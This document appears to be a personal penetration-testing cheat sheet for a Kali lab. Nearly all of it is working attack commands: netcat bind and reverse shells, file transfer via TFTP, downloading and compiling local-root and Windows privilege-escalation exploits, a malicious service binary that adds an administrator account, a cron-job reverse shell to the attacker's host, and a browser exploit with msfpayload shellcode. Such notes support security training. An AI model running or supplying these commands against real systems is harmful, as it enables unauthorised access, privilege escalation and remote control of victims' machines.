Pentesting with Kali


# Netcat

Kali              192.168.2.10
Windows           192.168.2.12

# Chat
Windows           nc -nlvp 4444
Kali              nc -nv 192.168.2.12 4444

# Bind shell
Windows           nc -nlvp 4444 -e cmd.exe
Kali              nc -nv 192.168.2.12 4444

# Reverse shell
Windows           nc -nlvp 4444
Kali              nc -nv 192.168.2.12 4444 -e /bin/bash

# Transfer file
Windows           nc -nlvp 4444 > incoming.exe
Kali              nc -nv 192.168.2.12 < /usr/share/windows-binnaries/wget.exe
------------------------------------------------------------------------------------------------------

# Ncat is part of the nmap package.

# Bind shell
Windows           ncat -nlvp 4444 -e cmd.exe --allow 192.168.2.10 --ssl
Linux             ncat -nv 192.168.2.12 4444 --ssl
------------------------------------------------------------------------------------------------------

# TFTP

mkdir /tftp                                      Create a new home folder for tftp
atftpd --daemon --port 69 /tftp                  Start tftp and assign home folder
netstat -anup | grep atftp                       Verify the service is running
cp /usr/share/windows-binaries/nc.exe /tftp/
tftp -i <attacker IP> get nc.exe                 Run from Windows
------------------------------------------------------------------------------------------------------

# Wireshark

Capture > Interfaces > choose your interface.
To filter out unwanted traffic choose Options.
Create a capture filter to only listen for traffic on the Windows box on TCP port 4444.
     host 192.168.2.12 and tcp port 4444
     Start

Now generate some traffic with netcat.

Go to Wireshark and hit Stop.
Right click on any packet > Follow TCP Stream. You should be able to see clear text.
------------------------------------------------------------------------------------------------------

# tcpdump

tcpdump -r <capture.pcap>                              Read the file
tcpdump -n src host 192.168.2.10 -r <capture.pcap>     Specify a source
tcpdump -n dst host 192.168.2.12 -r <capture.pcap>     Specify a destination
tcpdump -n port 443 -r <capture.pcap>                  Specify a port
tcpdump -nX -r <capture.pcap>                          Read the file and dump in hex format
------------------------------------------------------------------------------------------------------

# Google Hacking

site:target.com                                        Approximate web presence of an organization
site:target.com -site:www.target.com                   Locate Subdomains
filetype:pdf					       Locate all pdf files
intitle:
inurl:
------------------------------------------------------------------------------------------------------

# DNS

host -t <type> target.com				Enumeration
     mx = mail server
     ns = name server

host -l target.com <DNS server>				Zone transfer


# debug.exe

cp /usr/share/windows-binaries/nc.exe /root/
cp /usr/share/windows-binaries/exe2bat.exe /root/
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt
------------------------------------------------------------------------------------------------------

# Local Privilege Escalation - Linux

ssh user@<target IP>
id                                                     Show user/group permissions
cat /etc/shadow                                        Access denied
/etc/issue                                             OS info
uname -a                                               Kernel info

wget -O exploit.c http://www.exploit-db.com/download/18411
gcc -o exploit exploit.c                               Compile exploit
./exploit                                              Run exploit
id                                                     Show user/group permissions
cat /etc/shadow

Option 2 - using Kali
searchsploit linux local root
Mempodipper - Linux Local Root => 2.6.39 (32-bit & 64-bit)                /linux/local/18411.c
cp /usr/share/exploitdb/platforms/linux/local/18411.c /tmp/
cd /tmp/
gcc -o exploit 18411.c                                 Compile exploit
service apache2 start                                  Start apache
netstat -antp | grep apache                            Verify the service is running
cp /tmp/exploit /var/www/                              Copy the exploit to the web root
------------------------------------------------------------------------------------------------------

# Local Privilege Escaltion - Windows XP, 2003

searchsploit ms11-080
cp /usr/share/exploitdb/platforms/windows/local/18176.py /tmp/
cd /usr/share/pyinstaller/ 
pyinstaller -F -n evil.exe /tmp/18176.py
cp evil.exe/dist/evil.exe /tmp/
service apache2 start                                  Start apache
netstat -antp | grep apache                            Verify the service is running
cp /tmp/evil.exe /var/www/                             Copy the exploit to the web root
------------------------------------------------------------------------------------------------------

# Weak Services - Windows

Windows
Install vuln app
services.msc
Find the service > RC > Properties
Note the path to executable
cd to that directory
icacls vulnapp.exe                                     Misconfigured if the Everyone group has access

Kali
cat adduser.c
#include <stdlib.h>
int main ()
{
   int i;
   i=system ("net localgroup administrators lee /add");
   return 0;
}

i586-mingw32msvc-gcc adduser.c -o adduser.exe          Cross compile code
file adduser.exe
mv adduser.exe /var/www/

Windows
Open IE to <kali-ip>/adduser.exe
move vulnapp.exe vulnapp.exe-old
copy c:\users\lee\Downloads\adduser.exe vulnapp.exe
log off
log back on
services.msc
Restart vulnapp
The account with Users privs should how have Admin privs
------------------------------------------------------------------------------------------------------

# Weak Services - Linux

find / -perm -2 ! -type l -ls 2>/dev/null              Search for WORLD writable files. 

Look for any cron jobs that are WORLD writable running at root.
nano /etc/cron.hourly/test.sh
bash -i >& /dev/tcp/<kali-ip>/443 0>&1

Kali
nc -lvp 443
Once the cron job runs, you should have a shell with root privs.
id
------------------------------------------------------------------------------------------------------

# Client Side Attacks

MS12-037
CVE 2012-1876
wget -O exploit.html http://www.exploit-db.com/download/24017
mv exploit.html /var/www/
service apache2 start

Windows
Open IE to <kali-ip>/exploit.html
netstat -an:find “4444”                                Look for a bind shell

Kali
nc -v <target-IP> 4444
------------------------------------------------------------------------------------------------------

# Replacing Shellcode

msfpayload windows/shell_reverse_tcp LHOST=192.168.2.10 LPORT=443 J
314 bytes in size
342-314=28 bytes left over
Copy over the new buffer, then add 28 nops.
%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090
nc -lvp 443

Windows
Open IE to <kali-ip>/exploit.html
